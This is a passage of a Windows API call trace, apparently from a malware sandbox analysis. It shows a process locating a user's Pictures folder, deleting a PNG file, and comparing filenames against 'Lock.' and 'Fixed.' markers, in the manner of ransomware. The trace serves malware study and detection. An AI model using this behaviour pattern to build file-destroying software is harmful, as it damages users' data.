wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0211.762] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0211.762] FreeLibrary (hLibModule=0x76390000) returned 1 [0211.762] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0211.762] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0211.762] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0211.762] CloseHandle (hObject=0x504) returned 1 [0211.763] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0211.763] CloseHandle (hObject=0x4f4) returned 1 [0211.765] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0211.765] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0211.765] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0211.765] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf438, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0211.766] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures/v1scJjcpwcvzTSqU.png", nBufferLength=0x104, lpBuffer=0x8cee18, lpFilePart=0x8cedf4 | out: lpBuffer="C:\\Users\\FD1HVy\\Pictures\\v1scJjcpwcvzTSqU.png", lpFilePart=0x8cedf4*="v1scJjcpwcvzTSqU.png") returned 0x2d [0211.766] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\v1scJjcpwcvzTSqU.png" (normalized: "c:\\users\\fd1hvy\\pictures\\v1scjjcpwcvztsqu.png")) returned 0x20 [0211.766] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures\\v1scJjcpwcvzTSqU.png", lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x342feca0, ftCreationTime.dwHighDateTime=0x1d5cff9, ftLastAccessTime.dwLowDateTime=0x3269c7b0, ftLastAccessTime.dwHighDateTime=0x1d5c85b, ftLastWriteTime.dwLowDateTime=0x3269c7b0, ftLastWriteTime.dwHighDateTime=0x1d5c85b, nFileSizeHigh=0x0, nFileSizeLow=0x89d8, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="v1scJjcpwcvzTSqU.png", cAlternateFileName="V1SCJJ~1.PNG")) returned 0x9e1bf8 [0211.766] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\v1scJjcpwcvzTSqU.png" (normalized: "c:\\users\\fd1hvy\\pictures\\v1scjjcpwcvztsqu.png")) returned 1 [0211.768] FindNextFileW (in: hFindFile=0x9e1bf8, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x342feca0, ftCreationTime.dwHighDateTime=0x1d5cff9, ftLastAccessTime.dwLowDateTime=0x3269c7b0, ftLastAccessTime.dwHighDateTime=0x1d5c85b, ftLastWriteTime.dwLowDateTime=0x3269c7b0, ftLastWriteTime.dwHighDateTime=0x1d5c85b, nFileSizeHigh=0x0, nFileSizeLow=0x89d8, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="v1scJjcpwcvzTSqU.png", cAlternateFileName="V1SCJJ~1.PNG")) returned 0 [0211.768] FindClose (in: hFindFile=0x9e1bf8 | out: hFindFile=0x9e1bf8) returned 1 [0211.768] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f3ee0 | out: hHeap=0x2af0000) returned 1 [0211.768] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ad8 | out: hHeap=0x2af0000) returned 1 [0211.768] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa768 | out: hHeap=0x2af0000) returned 1 [0211.768] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa600 | out: hHeap=0x2af0000) returned 1 [0211.768] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5e8 | out: hHeap=0x2af0000) returned 1 [0211.768] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0211.768] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa690 [0211.768] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5a0 [0211.768] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ab8 [0211.768] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6a8 [0211.768] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa708 [0211.768] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b58 [0211.768] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5e8 [0211.769] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b58 | out: hHeap=0x2af0000) returned 1 [0211.769] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x2a7a350 [0211.769] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b18 [0211.769] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0211.769] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa768 [0211.769] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7f8 [0211.769] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa648 [0211.769] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa678 [0211.769] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa768 | out: hHeap=0x2af0000) returned 1 [0211.769] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa630 [0211.769] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71af8 [0211.769] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf438, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0211.769] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa810 [0211.769] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e18 [0211.769] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b98 [0211.769] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71af8 | out: hHeap=0x2af0000) returned 1 [0211.769] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a7a350 | out: hHeap=0x2af0000) returned 1 [0211.769] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b18 | out: hHeap=0x2af0000) returned 1 [0211.769] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa678 | out: hHeap=0x2af0000) returned 1 [0211.769] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa648 | out: hHeap=0x2af0000) returned 1 [0211.769] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa630 | out: hHeap=0x2af0000) returned 1 [0211.769] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7f8 | out: hHeap=0x2af0000) returned 1 [0211.769] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5e8 | out: hHeap=0x2af0000) returned 1 [0211.769] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa708 | out: hHeap=0x2af0000) returned 1 [0211.769] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6a8 | out: hHeap=0x2af0000) returned 1 [0211.769] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b68 [0211.769] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6fc0 [0211.769] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7c8 [0211.769] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x70) returned 0x29f3ee0 [0211.770] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e18 | out: hHeap=0x2af0000) returned 1 [0211.770] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7c8 | out: hHeap=0x2af0000) returned 1 [0211.770] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa708 [0211.770] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa708 | out: hHeap=0x2af0000) returned 1 [0211.770] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b88 [0211.770] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b88 | out: hHeap=0x2af0000) returned 1 [0211.770] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa720 [0211.770] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa720 | out: hHeap=0x2af0000) returned 1 [0211.770] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6fc0 | out: hHeap=0x2af0000) returned 1 [0211.770] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b68 | out: hHeap=0x2af0000) returned 1 [0211.770] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ab8 | out: hHeap=0x2af0000) returned 1 [0211.770] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa720 [0211.770] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a78 [0211.770] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa768 [0211.770] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6a8 [0211.770] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a48 [0211.770] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5e8 [0211.770] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a48 | out: hHeap=0x2af0000) returned 1 [0211.770] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5e8 | out: hHeap=0x2af0000) returned 1 [0211.770] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6a8 | out: hHeap=0x2af0000) returned 1 [0211.770] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa768 | out: hHeap=0x2af0000) returned 1 [0211.770] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a78 | out: hHeap=0x2af0000) returned 1 [0211.770] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x5c) returned 0x2a74d90 [0211.770] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures/v1scJjcpwcvzTSqU.png", nBufferLength=0x104, lpBuffer=0x8cf65c, lpFilePart=0x8cf650 | out: lpBuffer="C:\\Users\\FD1HVy\\Pictures\\v1scJjcpwcvzTSqU.png", lpFilePart=0x8cf650*="v1scJjcpwcvzTSqU.png") returned 0x2d [0211.770] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a74d90 | out: hHeap=0x2af0000) returned 1 [0211.770] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\v1scJjcpwcvzTSqU.png" (normalized: "c:\\users\\fd1hvy\\pictures\\v1scjjcpwcvztsqu.png")) returned 0xffffffff [0211.771] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f3ee0 | out: hHeap=0x2af0000) returned 1 [0211.771] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b98 | out: hHeap=0x2af0000) returned 1 [0211.771] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa810 | out: hHeap=0x2af0000) returned 1 [0211.771] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5a0 | out: hHeap=0x2af0000) returned 1 [0211.771] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa720 | out: hHeap=0x2af0000) returned 1 [0211.771] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa690 | out: hHeap=0x2af0000) returned 1 [0211.771] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0211.771] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5edc0 | out: hHeap=0x2af0000) returned 1 [0211.771] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0211.771] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0211.771] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ae8 [0211.771] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a98 [0211.771] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa618 [0211.771] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7c8 [0211.771] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ad8 [0211.771] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a68 [0211.771] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a68 | out: hHeap=0x2af0000) returned 1 [0211.771] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa570 [0211.771] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ad8 | out: hHeap=0x2af0000) returned 1 [0211.771] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6f0 [0211.771] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b18 [0211.771] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa588 [0211.771] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b18 | out: hHeap=0x2af0000) returned 1 [0211.771] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="W9bUf5L8kEVKE-hdQ.png", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0211.771] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="9bUf5L8kEVKE-hdQ.png", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0211.771] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="bUf5L8kEVKE-hdQ.png", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0211.771] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Uf5L8kEVKE-hdQ.png", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0211.772] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="f5L8kEVKE-hdQ.png", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0211.772] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5L8kEVKE-hdQ.png", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0211.772] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="L8kEVKE-hdQ.png", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0211.772] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="8kEVKE-hdQ.png", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0211.772] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="kEVKE-hdQ.png", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0211.772] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="EVKE-hdQ.png", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0211.772] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="VKE-hdQ.png", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0211.772] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="KE-hdQ.png", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0211.772] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="E-hdQ.png", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0211.772] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="-hdQ.png", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0211.772] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="hdQ.png", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0211.772] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="dQ.png", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0211.772] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Q.png", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0211.772] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa570 | out: hHeap=0x2af0000) returned 1 [0211.772] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7c8 | out: hHeap=0x2af0000) returned 1 [0211.772] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa588 | out: hHeap=0x2af0000) returned 1 [0211.772] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6f0 | out: hHeap=0x2af0000) returned 1 [0211.772] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa618 | out: hHeap=0x2af0000) returned 1 [0211.772] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a98 | out: hHeap=0x2af0000) returned 1 [0211.772] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ae8 | out: hHeap=0x2af0000) returned 1 [0211.772] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e980 [0211.772] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0211.772] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ab8 [0211.772] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa618 [0211.772] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa780 [0211.772] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719c8 [0211.772] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a68 [0211.772] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a68 | out: hHeap=0x2af0000) returned 1 [0211.772] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa798 [0211.772] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719c8 | out: hHeap=0x2af0000) returned 1 [0211.773] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa588 [0211.773] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ad8 [0211.773] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6d8 [0211.773] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ad8 | out: hHeap=0x2af0000) returned 1 [0211.773] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa540 [0211.773] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ac8 [0211.773] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa828 [0211.773] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ac8 | out: hHeap=0x2af0000) returned 1 [0211.773] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7b0 [0211.773] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71af8 [0211.773] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x2c) returned 0x2aa6300 [0211.773] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b28 [0211.773] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="W9bUf5L8kEVKE-hdQ.png", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0211.773] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="9bUf5L8kEVKE-hdQ.png", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0211.773] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="bUf5L8kEVKE-hdQ.png", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0211.773] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Uf5L8kEVKE-hdQ.png", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0211.773] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="f5L8kEVKE-hdQ.png", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0211.773] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5L8kEVKE-hdQ.png", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0211.773] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="L8kEVKE-hdQ.png", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0211.773] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="8kEVKE-hdQ.png", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0211.773] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="kEVKE-hdQ.png", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0211.773] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="EVKE-hdQ.png", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0211.773] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="VKE-hdQ.png", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0211.773] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="KE-hdQ.png", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0211.773] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="E-hdQ.png", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0211.773] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="-hdQ.png", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0211.773] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="hdQ.png", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0211.773] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="dQ.png", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0211.773] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7b0 | out: hHeap=0x2af0000) returned 1 [0211.773] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x30) returned 0x2aa6488 [0211.773] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7e0 [0211.773] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa6488 | out: hHeap=0x2af0000) returned 1 [0211.774] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71af8 | out: hHeap=0x2af0000) returned 1 [0211.774] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa798 | out: hHeap=0x2af0000) returned 1 [0211.774] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa780 | out: hHeap=0x2af0000) returned 1 [0211.774] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6d8 | out: hHeap=0x2af0000) returned 1 [0211.774] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa588 | out: hHeap=0x2af0000) returned 1 [0211.774] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa828 | out: hHeap=0x2af0000) returned 1 [0211.774] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa540 | out: hHeap=0x2af0000) returned 1 [0211.774] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa618 | out: hHeap=0x2af0000) returned 1 [0211.774] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ab8 | out: hHeap=0x2af0000) returned 1 [0211.774] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa6450 | out: hHeap=0x2af0000) returned 1 [0211.774] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71aa8 | out: hHeap=0x2af0000) returned 1 [0211.774] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9298 | out: hHeap=0x2af0000) returned 1 [0211.774] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa90e8 [0211.774] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7e0 | out: hHeap=0x2af0000) returned 1 [0211.774] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0211.774] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f08 [0211.774] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b88 [0211.774] CharUpperBuffW (in: lpsz="A2100602512", cchLength=0xb | out: lpsz="A2100602512") returned 0xb [0211.774] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77f08 | out: hHeap=0x2af0000) returned 1 [0211.774] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b88 | out: hHeap=0x2af0000) returned 1 [0211.774] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa540 [0211.774] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a71a08 [0211.774] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa810 [0211.774] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7b0 [0211.774] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b38 [0211.774] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa720 [0211.774] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5e8 [0211.775] RtlAllocateHeap (HeapHandle=0x2af0000, 